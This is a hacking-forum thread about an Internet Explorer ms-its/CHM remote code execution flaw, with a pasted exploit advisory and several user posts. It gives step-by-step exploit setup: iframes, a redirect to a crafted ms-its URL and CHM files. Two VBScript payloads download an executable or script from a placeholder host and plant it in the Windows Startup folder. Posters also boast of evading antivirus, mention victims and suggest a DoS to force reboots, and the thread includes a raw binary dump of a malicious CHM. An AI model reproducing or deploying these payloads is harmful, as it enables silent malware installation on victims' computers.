Bizai.a

Original Exploit

i tried playin with it, not sure how it works. hehe probably something easy im overlooking, any help would be appriciated

Yes, it works fine ...
Very nice.

And i found a easy way to "kill" this bug!
U have to set "READ ONLY" to the dir c:\winnt\Downloaded Program Files
and the exploit doesnt work anymore.

ok thanks for the info. But i dont understand how this ting is working
ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm

what is this ss.MHT file ? how can i create it and should i put it in the same folder as the other files? and the .chm file.. does it matter what .chm file i use as long as i name it chm.chm?

These are better than any bind shell, sence they can be spoofed as IE with PID using connectback , tunnel through any app firewall.

Don't really know how to use this but I'll check it out and give it a try

Thanks for the info

Norton won't let you view the page because it contains a trjoan it says...

I played around with this one a bit too and I can't get it to do anything from
ms-its:mhtml:file://C:\someMht.mht!someUrl::/someTopic

I tried loading it from img src, iframe and meta refresh, and jimmyied
around with each part playing with "'s and /'s and //'s and \'s etc, but none were successful.

There is another older CHM exploit that uses showhelp() to download and run the chm to a
known location, and because when you make a CHM you can compile in a reference to a topic
in the help file pointing to an html page (with vbscript inside or whatever) and then use the
::/NameOfTopicInsideCHM.htm to run the vbscript in the html in the chm locally thereby
r3333t! haXx0ring with IE - this is a very serious vulnerability, obviously, because given the
ability to download from a site and then run the chm compromises the local zone, or my computer
zone, wtf ever.

But this ms-its:mhtml:file:C:\xxx.mht!url::/topic.htm I do not understand... Perhaps someone
who has had some luck with it would be so kind as to post the proper syntax, or if not that,
try to explain whats going on in the given exploit line?

That would be neat.

ya know JDog45 if it wasn't for av software ms would have us all using tin cans and string

if anyone could give a little more input as to how this exploit works and how to get it working, it would be greatly appreciated

That link to the CHM syntax page refers to what works on Win98 with IE5.

I'm tellin' ya, it don't work.

Also, the link that toska provided to Bizai.a - the code given on that page (http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PHP_BIZAI.A&VSect=T) doesn't do a thing on a patched IE6 as
far as I can tell.

I played around with it also
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='mstasks.exe'>

from inside htmls in local zones, and then i compiled it into a CHM and tried running it in different ways from different locations and IE6 will have nothing to do with that CLSID - it gives a warning and does nothing. I think the whole thing is bogus.

hmm.... interesting. I don't think i will be able to get it to work. Never have!

Thanks for the post

I worked on this one several weeks ago and decided it wasn't valid against ie6. Gave up over a week ago. Anyone gets it to work, please msg me for massive reward. Thanks.

It does work, locally. The cool thing is, that the second time it loads the .chm file, it loads from the cache (AKA my computer zone). Play with it some more, and it will work.

P.S., some more info about that "massive prize" would be nice also.

Is it just me or was this one discussed a while ago, a .wmz file or something ?

Did you ever seen it works?

works good :>

i got it bypass KAV perfectly but now had to setup an NAV box to check where is wrong cause NAV lighted up reported by the victim site users..

I hope someone is able to decript this, I found it running outthere loose and stuff but
it seems interesting....


ITSF `
4—QÈ  ý
|ª{О É"æìý
|ª{О É"æì`  x T Ì þ
Ò3 ITSP
T
 
ÿÿÿÿ ÿÿÿÿ
 j’].!Ð�ù É"æìT ÿÿÿÿÿÿÿÿÿÿÿÿPMGL?
ÿÿÿÿÿÿÿÿ
/ /#IDXHDR
�ƒ^ /#ITBITS /#STRINGS
�¤(
/#SYSTEM � z/#TOPICS
�£^/#URLSTR
�£z./#URLTBL
�£n/$FIftiMain
/$OBJINST
î•?/$WWAssociativeLinks/ /$WWAssociativeLinks/Property
î/$WWKeywordLinks/ /$WWKeywordLinks/Property
î/iefucker.html
î::DataSpace/NameList <(::DataSpace/Storage/MSCompressed/Content ¢ £V,::DataSpace/Storage/MSCompressed/ControlData j)::DataSpace/Storage/MSCompressed/SpanInfo b/::DataSpace/Storage/MSCompressed/Transform/List <&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable ÅV0 Ü

… =     U n c o m p r e s s e d  M S C o m p r e s s e d { 7 F C 2 8 9 4 0 - 9 D 3 1 - 1 1 D 0 )R  LZXC  

 `£4@  HHA Version 4.74.8702  $  —QÈÞöÃ
  iefucker.html   1  
T#SM‘ÜS


   "2PU _ {z:ÎL„Ûal;š 6[Úï¾÷~êºbB¶ÅIB·±í*òR#ç䜰թZj©_j¥6VDùp¹¦+V¿QýU¿ÕoWQ9*` DfàÌ ®ì?=ï{
êíûŽí“$»³`¯ÖI7` keÀÎmÅD‚(}¾T
Ï(ˆ£&‘�Qò;ðM†4I׬
¶éiêº.&Ùº?  
¢£îfÌÿp¹Y¶d @”$(a¾>bPQ#yÚÀþ=ô!t¾<½k£ù’
ûsõ\¦ò½„v‚@¿0¡.­®-¨Ïskóä^ :Ë•`íÜSŠ§± \_§˜`¯¯Ñ­¦vKX¶RQÈÔ£å<Ò¶³%à¿{? $;„bè£î%·Ù­É¼—OÞ¾ä6Œ¤
LÛ¬ÍäEâ%ÈÃÅrÚ
›@;!†âšRK]ƒ[ÿK™I߶Šœ©2
ûnj3h>-F½vb»û›µnï-)RÌýkÝRl
Q!ìÞìwÿýÇIçAB“x,¹öpß¡ ¢xð�’0HíJFI»åŠà3²Ú¥°¤¤TuöŽûñ R|AˆM*wHŽ•¸@PW0œ� �ù3Ä’oJS®±ðNPð‚Þ21s-ø™‡(Bñh¸·.9®=¸ãD´Õè»ÂÝBâ#Áßvšµ«ìÕX8¯÷Œƒ…ºŠXyåèrÕh«j'ÿ½ÈHK¨QÚ¬d0¦ÉïH¯&Øï)\ÆÄn‹¡)EÉCÛß�‡tÑàÄ:À›�À¦6úDø5Ãî…¨ÓqÃ�‚€ë‰
év
?–à²�ÑÌÙï}´~À¬ ,vïŒ6¡´vˆN“�džÉfà�w«Sb 8Zi 6Ù¬M~gÝ'‘¹Ö¥ä,µéΛ+¡¾3îatH§áò“Ë`t;j·F‘Ìf6šitu_õèq⋸n{ûí[Áâ©p©½Ú0™Gú]ì‚´>|ýlÏ·ŸÏÙy3BŠeÔ¹Wˆª¡ aU�×#i�
ÂÆÇ&zá?�#0Wo<œjÇÞ\yÆ=ÃG“ê(1éRù¡´@Q!ÑP”>ÄÃ[Ù%»S”—Åî’½ïæ¬ø«3G–í�JÊ5-(�öß´
Eò^bÖÅ^!Û0÷èSa?ìH�ëÏ„œþäðQÏrI'
]H3‰«¼“#£ø½:å`&àm[±tßlb*'¢6†&Þ ý�¼FÊÉëÔbe_‹%U=·QÇU³
)×hGgæüt=Ä#Øñ^\Ýÿv¦{ü¼)|G²ÞäPºtÔ"Êñ(,õ¡_Æ!XÒ|t­âqûg+®s9
†‡]Š�¢šu=BIòŸU�z|~¬Ô�«v¥v¸sÆ[Ø*óñÇ•º®cè4:ä d•²ÇŒ
x7—Îvt|°‡]*ÚR‡P5ïK�Ú«â„7 ý°f+2ã`Â&:®’3~<=]�Ó4lõ¯™�Ëd-ÀÆ$Æû¿Ù˜š_‰1NE6’Ht"ÁéÁêfÉW¢�ÌÞŽt"iw£F¸¹ïìµ}O™ŒQ�ÇŒa²�ó´ü;º¡sâá»þ0ö&<ÉØS%Í6Ð\I‡‘á"ýeDTƒ©c'ÂÉqSÛÆ—ïòÐ"“{ÈѾëTÊ?oÅÆŠÑ+™Q&˜n¶F“¦ø�e3ÑX»û@8“à ¦HØÝ2iœ·=Óxl¾­Ü
u¯L1¿¸BÛ{æŸäîxxÙQ2ƒ#(æ_sÒ(‰Õ±œ¹PG63; 4æîCßå�2ÝΘŒÁmä!vz|–­¨œ�~7C&*ŠÄÐÃûŤCÎyxâËmÎ|ŠÀé%àYÛ
ç84rùn.n†ÊF„^½²�Ez<v ú:Ž›þ“¦pgæP¤ã-Û¥Hoý˜ø#).~B ˆ*'n¦4’³$r
%Ž“cx(â£øqñÃó�mN¨ƒ7ä¯ç·Ä�pà]MPQèÐœ�—™T¥aÚ“ÆÕAt �]lÓü¾ £Ÿÿ+—Ô`˜G*Â[¾ã÷¶¢’|!Òè~|Û‹ý HpǤ;ÁçH84ºZ©Zø5h%¼äÕ°†ê¦‰ÄXäÝĈ¤²+ÙU¤˜¢S¿>F^«Ûà+W&~>.Ŭ­§âR¦ö‡Ö&ÌÆZ…u��ºDm#�MÏ]eÚÛGþ6ŒEháÏËêîÁïWŸØ(û.<TŒN$H•JŸþ°° ³æ A“«Æ#›±¸¤S¢Ÿ[…DyÜ;
) é=/ú™MeùÛ½!(Ä1É(sÉîæ!R{ÎkFwÙ¢16B÷{x#ìA¹O@ÚÀÎeÙ•™RPäF™Ÿul ŒË짱2CÊíâPq‘/-†×«ÄG§‚§Hg8a4‚µZÄß^Õýg®šî¹â\8y´¥ÌÛCš ‰ÿÝFžz³‡">Nsí4×I䛤÷Û´½¿¸Ò—Ÿx°ûJÕŒ n‡ÿuÒçÏÚŽÙ–V1*A»L•N
$�Ô¬ì-ºf{XFù§©ó—‹Øß-‹ÓõÇ“¿aš©—±šþ8>Gø |›\áÕÿ€ÝÊ¡^f.<ü‰¸ã�Ilk}$³‚W'…‡†òÈL9ê¿Èê ;ð¿=Ä ›¥ˆÐiR‘'!/Á$Émˆ<
ëP”¥é“ÍìKžÉÓþX±|†ŽV¥õ«CdI—œ˜™LƒYµ²Àx
‰zÍ#/RË(´íDoÝ‹‹ÃäÜ|™náôŠÇßGRGõ
:ô7Ýxò@[7³EӣВÂÒõ�Q¡6”ðzS÷fh¬/ƒ#pÙÃ[!�±n—A$ ˜·²ú�"ÏuF{vp$w�$°/àXn.£có_¸ü5®¾à{*AÃ:²‹«ÖìƒÏ?&˜¤Õ£��lŸ¼šñ˜¿¯ê†X½
óħöÿ®E·/Çÿ¸I`µ&óR 7]ÓÂH¬ÿÅžPñó$¥"Í]£ÖÑÈÀgÚzÊyîG~išÇ[V*M
³wUHW<@Ù@6C\ÃËO\¨J/A;ÿzd=äß¹^ø.˜ßI¯~q.c•pÍN“r¢`Oƒ=îª{èFÏ
ÞÂkÂÓ¬Ào Žï¾(^U¿ž„¤Ù‘Ïå8¯Ãù«ø²ø6¸óp]³9–è%ˆCR)F3åžËæž�Q†™¤àæDHlªFíù:5ÆâÕëw@ qÓ^#ßÏ2Bq–0G­ožz“
ŽÕ\¦v¾+WŠBãy×¾ã.º¼t.ÏQ…3…À�~AìpUÍâ+Å”1##Ë,CS^Ù}«\ÚÔ¶q>�w~˜<T`IÿüƒJ dømfÀl ~¤Gÿ1êé 5YZ

0ke¿IÓ1;^5òmù3";Þ‘\›ÆåW{¼ëK>“ápbP¯[œáÊ#%´¼—ø–ÐÆz7 ”(Ô$›WÂÖ2>çzéCw§ a]Z`][-ž“M°°¬Ü‚ù1s\\œZ'0¶_fµö}­h¹�s}�|z·¾ðA59…[ØqºžB°-֧ѓÊSrÞ£¼TãZÊ7êtö=³˜lgÒV½xQD¨�ÊІPšg×�x—טV›W�d„²F·^\ž[Åz¬›š7úòÍÔwnÔ?¼qÍ<^ËÌíšÜ¥›+ìSý®¶Ï™Z×OÙõ»cÄ[õý¬ÿ’6gû¡æ³2/ؾ—o>ñFk4z®”æ…gv
›‚Uº$ÌMö–óTô%¤ø¶f�¿a×Ø”r´#P“írðv¦ó§²”1Wñ'ÏÓZ_Ê “ß�qkîfW|�Ý­&wIw¿M�aÜ¥Ñ0ÒïX°70/ Px 7²žÊɼKÓê<�+T³Ö?xÔ~Žç îã’§˜:Ç
êåÚ�;>÷•�Šw©|gmn£n¹«I³ìc;•M}0ƒµV]æƒ�k$?Ä =zd$Ë:¶ÄË&YÔ1jóRj7 -Õ›u:Œ[Lg7�=HÙµ¬OÒÝCíëwÿ–áPï’ÃYîD§¡´«2©*¦»[îïmÎ镦G>ö�o5%€knÓ¿{õ
}Ì&I)íÿœ8Âj {âQ ¬ ©ÓdnS�Ö”áœ3¤†øiZdÛ†…á�gYä9™ãÖô†ÎRrO£®9gP
ÃÓÙëCÎ7UÕU`µûO³è‡œ4±þð9“{ÈO#Ð
xŽßëЦ¡²†úžgÕ
9Ó\úÃçÌú!žæØ9gÙð46û�s†öžgÚ;£¥íƒýDƒ³,pV›u<�2)�0B é~—Áí‰SŽb*·' 9ð¥Tà=Ášeêlñ~;Ù~BÑù6%!!§×üYô
bOŽÖÔl%
DÇþBHt·ÎŽ!
‡$ãJ¢ip‡ˆ58D$"ÂNˆìƒ£"¾à,Hð“‚�šèÈÙ 0üE¡ÁÄCe ã=0@
ášJðÄR÷œ¹'):�Û·D61sܧÈéZë¡NÑFæT†<±F÷Ú‡',š™‹Ù¡¡,š¿OЄKìÿ4â«+hvih¼«j'4¼Ê;çÂ4½"<Å4_Õ5ß…h|ëkÓCS,Ù¶PC¬ªOü4ãµ2ÿ•h~YI›`eyn†~hÍpWhvÖ€_ih4K„MÕÐh–¿ïÐ4K„okh?‹±Ñ¤D…äO
9“¨Ð“‰«§üY¡z¾&ʳbÈu=øo³9œ‡¦Ñö#L@ÎÂãÈyx9O�ç q <áä'<�œ„Ç�óð8ržÎã@yÂÈOx9 � çáq
=Oì<éð;Ÿðà|"ƒc ÂÎñh
êO586±šm;…G�}±NŽ”ž{&%ÓÌp`œ>›ÏÏìóÑ•�6‰£YâW9©ÖšUkÈRÂ|é8çÎÉL‰d¦S&¾´Óô\j£çyÔM›W¯µ˜)EÜ)o¼¯MqkÀ³M·lˆ�ú”ƒ}‰ê¨P¨v!»5*Kc’íX©¹TM>e�µ�:ºv©ÇEÊvÛGÞc‘U©ÝTVwG9²U«øã=öWKn¹ÛAfß.ã·JÃÜÅ
7yçEÄ°V-¯^óÌV&î8�9w¡ÆXÀ–»Åä¾—ùÜ\~ñ26k=T¿Èä#¼p$+_Ì=ëx
ì_ =»¨é¦sÌâ+nìüö„í.<»áó»‹íî„Ä]ìxãù’-/~²É‚†í+?_…ç_|ò•~¸’+ˆWt�+¢øÏü¬™,ëq”­wøêÒ Þ…¾÷±Ç¦d¾‹�o­/ ÙöTCæÜüªïÂí»s‹õçkÝ�þ(ëH~þ»ûþw ~¡ÎwyçMÖ^ô€ûìN6^ �îu^‚ú’A+¸\íG¨Vâ¼X9ox
NÊÁZV­rëŠ/ßXÅ^ø¢‹¹2ôÐ}&/3‹Ù†c¶¾?G�&ÉÒéÄ*#éá‰Ò–t&>I“¸_ᙯtÅ}Åmõ�EéŒ^z�Ûºé8cŸî‘§q½»ïÈH
9gŸ»2õÕwê‘“z.9ª«“38ã9ãM‚h˜Ë•oåðˆ-7=‘*#úåºî}à³>3¬ë˜ÓzÔ+Uª™�íuuÍ5ª!ZE{sï¾!�SÎ�);·¥KÏ™;mœI6ýgšµAFm4tvêB"ÇRmÑY{�ž>Igm¶t†
µ��F5g¢SO™©TÔFª;uÚnUgªTX ¾ÕjÕu¦~›gÞ·[ÆmÛuà†øgêÕuæjõ$³Nô°Ã9å;CÕÏh¸«&îUvÁŠåŸn¹vFž{gæØùê=­/˜õ
¼rÚ³ÜÒO[h_lóäå†õã-¬“ùÓk¾˜ÉÀV‚‚ç;
•{”V!9½KŠ½íoÚfFý6½Ó]š“ÇZ¿ f ö}aŒ1”iÔãd¦
uðw¹Ð¡½4��ºø;è‰%´êÅ
O±¡=öÎBOzÁL,àN ~ ˆ
 ( )R Ö €

garbage....nothing else, IE can't display sometjing like that because it isn't HTML code....

Thanks for the hint, what, you're absolutely correct. Figuring out how this works was like a fun little puzzle for me because I'm not a webmaster-type. This exploit method is nuts... the fact that it works on the most-used browser on earth is nuts.. there are definitely other ways of making this happen... luckily its not very obvious how to put the whole thing together.

Anyway, that doesn't solve our problem, I didn't see any wep page with ^^ exploit included (I mean CHM...lalala).

nevermind

I don't have time to check this one yet, but try downlading Help Workshop... You can create CHM files with it as I recall in my previous exploits... Check it out and see..

For people that are still having trouble with this. . . . .

You want to download the .html file that has the exploit code as a .chm

To do this, you simply switch some perameters in the code (switch the .html to where the .chm file is) and then the .html code will be loaded from the local cache (which IE thinks is actually a .chm file), letting this exploit, and several others that are only local, now work remotely. It is similair to another exploit we've seen (data object?) in regards to what you are trying to do. It's a very good example of people creating exploits based on the research of others, which I believe is very helpful in regards to computer information and security.

i have been trying to get this to work forever. here is thje release on how it works but it doesnt explain it well. here is proof it works though.
http://www.michaelevanchik.com/security/mi.../chm/index.html
it puts a exe in your start up folder called 'real audio'. i cant fiugre it out though. Also norton does stop this exploit.

OK, I think I will start playing with it, cause I am fully patched and it did work with me.. You can expect working POC in few days....

it doesn't work 4 me.My Start-up is clean.

It works!!

I don't know, I can't reproduce it. But the demo link works.

the owner of tha site that the demo is on goes by the name 'mcbain' on aim. i talked to him and he said he was going to explain how to do it and put it on his web site. but he didnt. i asked him and he said he was going to do it later that day and didnt. then i asked if he could send me the files so i could figure it out, but he didnt respond. so i just gave up trying to talk to him maybe someone else will have better luck.

Microsoft Internet Explorer ms-its scheme/CHM remote code execution

Feb 23, 2004


Vulnerable
----------
- Microsoft Internet Explorer 6.0 (lower was not tested)
- Microsoft Windows XP Pro
- Microsoft Windows XP Home
- Microsoft Windows 2003 Server Enterprise
- Microsoft Windows 2000 Professional


not tested if vulnerable
------------------------
- Microsoft Windows 98
- Microsoft Internet Explorer 5.x


Not Vulnerable
--------------



Severity
---------
Critical - Remote code execution


In English
----------
There is yet another horrible exploit in internet explorer that allows html to be run
in My Computer zone allowing system access all via a hyperlink of a webserver. This
easily leads to remote code execution without any user intervention.



Tech Stuff and Explanation
--------------------------
1. Create an index.html file with the following source code.

<IFRAME SRC='re_direct2.asp'>
<IFRAME SRC='re_direct3.asp'>
<IFRAME SRC='re_direct4.asp'>
<IFRAME SRC='re_direct5.asp'>
<IFRAME SRC='re_direct.asp'>

you might think this is redundent but the exploit does not work unless u have a couple iframes
before the actual 're_direct.asp' page that runs the exploit.



2. re_direct2-5.asp contain exactly the following

<IMG SRC='ms-its:mhtml:file://C:\bla.MHT!http://yoursite//chm.chm::/runit.html'>

even though this does not work and shows up as an invalid image, this helps the final
re_direct.asp work. If not used the final iframe does not work for some reason.



3. re_redirect.asp contains the follwing

<% response.redirect("URL:ms-its:mhtml:file://C:\bla.MHT!http://yoursite//chm.chm::/runit.html") %>

can you count the schemes in that url i see 5!!!


4. create a chm file that imports a file runit.html. You can create chm files with HTML workshop
downloadable at microsoft.com


5. runit.html includes the following code which i found to be undetected at the moment by avp's

<script language=vbs>
set oHTTP = CreateObject("msxml2.XMLHTTP")
oHTTP.open "GET", "http://yoursite/safe.exe", False
oHTTP.send
set oStream = createobject("adodb.stream")
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
oStream.type = adTypeBinary
oStream.open
oStream.write oHTTP.responseBody
oStream.savetofile "c:\Documents and Settings\All Users\Start Menu\Programs\Startup\Real Audio.exe", adSaveCreateOverWrite
</script>



Other things
-----------
- This obsiously will only work until the person reboots thier computer. You can add your on DoS to force
them to reboot. ASN.1 DoS seems to be a recent working DoS that you can use since you get the persons
ip anyway from them visting your webpage.

- Im not quite sure step 5 works if the computer does NOT have MDAC or Microsoft Data Access installed.
Most computers have it but there might be a few that dont?

- ms-its: is just another god forsaken scheme or protocol microsoft supports. There are probably lots of
others undiscovered





Proof of Concept?
----------------
- http://www.michaelevanchik.com/security/mi.../chm/index.html

- look in your start up menu for real audio.exe in the path above in step 5



Vendor Recommendations
---------------------
- Microsoft probably knows all its schemes and protocols more then the security researcher.
It sure would be nice if they looked at them all and found others that could lead to
the "My Computer" zone

- As always Microsoft should pay BETTER people to test their software instead of rewards for
virus writers

- Microsoft should not deny local zone vulnerabilites as "not a vulnerabitly itself" problems
since if combined with other "not a vulnerabitly itself" bugs lead to THE PROBLEM



Temp Fix
-------------
- Lock the my computer zone as untrusted. Guess you cant even trust yourself?
- Disable scripting in Internet Explorer
- Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox www.mozilla.org)


Credit
------
Thor from pivx.com for fiding the god forsaken protocol ms-its:
Http equiv and jelmer for the mshtml: discoverty ,local html execution code and examples advisories.
Liu Die Yu because of his nice webpage of bugs at http://umbrella.mx.tc/


Greets
------
- slacker my other brain
- illwill at illmob.org
- abe,rain and dolan


Contact
-------
Mike@MichaelEvanchik.com
http://www.MichaelEvanchik.com - me

http://Software.High-Pow-er.com - Need a professional programmer?
http://www.High-Pow-er.com - Other, Security, Consulting

Yap, but I havent manage to replicate this one.. I only tried with his compiled CHM file.. Maybe that is why it didn't work.. Just get non-compiled CHM to me and I will finish the rest and post here..
Also, if it is possible to "write" on local system, then you can better use that notepad owerwriting exploit.. Works only on XP as far as I know, but it is a sure hit..

I have gotten it to work on 95/98/ME/NT/XP/2000.

And you don't have to use asp, just any old server thingy that you feel like piecing together that will send a '302 Object moved' http header with the Location pointing to the ms-its again so that it reloads from its local cache. Works best if you give it a 3-5 second wait before you send 302 for dial-ups.

This sploit is really nasty. MS should issue a fix asap.

ok... what do you put int he chm file that makes it 'import' the runit.html file?

First make the HTML that you want to run locally on the target computer, put in all the vbs/js and crap, then if you're using HTML Help Workshop start a new project and under the Contents tab hit Insert Topic | Add and just plop in the html. Then the name of the HTML that you call from ms-its:mhtml is at the end of the string ::/thisHtml.html

An example html file that I was using for tests (running from the chm)

<script language=vbs>
on error resume next
set oHTTP = CreateObject("msxml2.XMLHTTP")
oHTTP.open "GET", "http://www.yourwebsite.com/whatever/compromised.vbs", False
oHTTP.send
set oStream = createobject("adodb.stream")
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
oStream.type = adTypeBinary
oStream.open
oStream.write oHTTP.responseBody
oStream.savetofile "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\compromised.vbs", adSaveCreateOverWrite
oStream.savetofile "C:\WINDOWS\All Users\Start Menu\Programs\StartUp\compromised.vbs", adSaveCreateOverWrite
oStream.savetofile "D:\Documents and Settings\All Users\Start Menu\Programs\Startup\compromised.vbs", adSaveCreateOverWrite
oStream.savetofile "D:\WINDOWS\All Users\Start Menu\Programs\StartUp\compromised.vbs", adSaveCreateOverWrite
</script>

Toss that into notepad and give it an html extension. The chm downloads the compromised.vbs to the startup folder, and it is run on the next restart or login as if the user had double-clicked it himself.

Can you upload non compiled CHM file please? My HTML workshop just eats shit and I can't create new one with the way you said..

i cant make it work:( damn message about opening or saving re_direct.asp is popping up, but when i visit this url http://www.michaelevanchik.com/security/mi.../chm/index.html
all is ok
plz help me

You should compile your own chm file.

I've been trying to find a way to make the downloaded file from the vbs run from the embeded html without doing something like overwriting notepad and then forcing the browser to view-source, or else dropping the vbs to Startup so that it runs on restart. I've tried numerous things but haven't found anything that works consistently yet. With the notepad method, it only works if notepad is closed when the target browser loads the infected site, and even then it doesn't work on all win versions. Any scripting guru's know a way? Maybe a trick with xml/ado?

@fyle
Yes, there is a way, just check other exploits, or reply on MY PM sent to YOU and I will send you solution... Nobody else should be sending me PMs..

You wanna say I am not too cool???
It is just that people understood that I said "PM me if you want this exploit", and I didn't mean that. So why wasting their and mine time just to PM me, when I don't have anything to offer regarding this issue.. There, I justified myself...
Anyway people.. Don't forget, I am 2cool4you...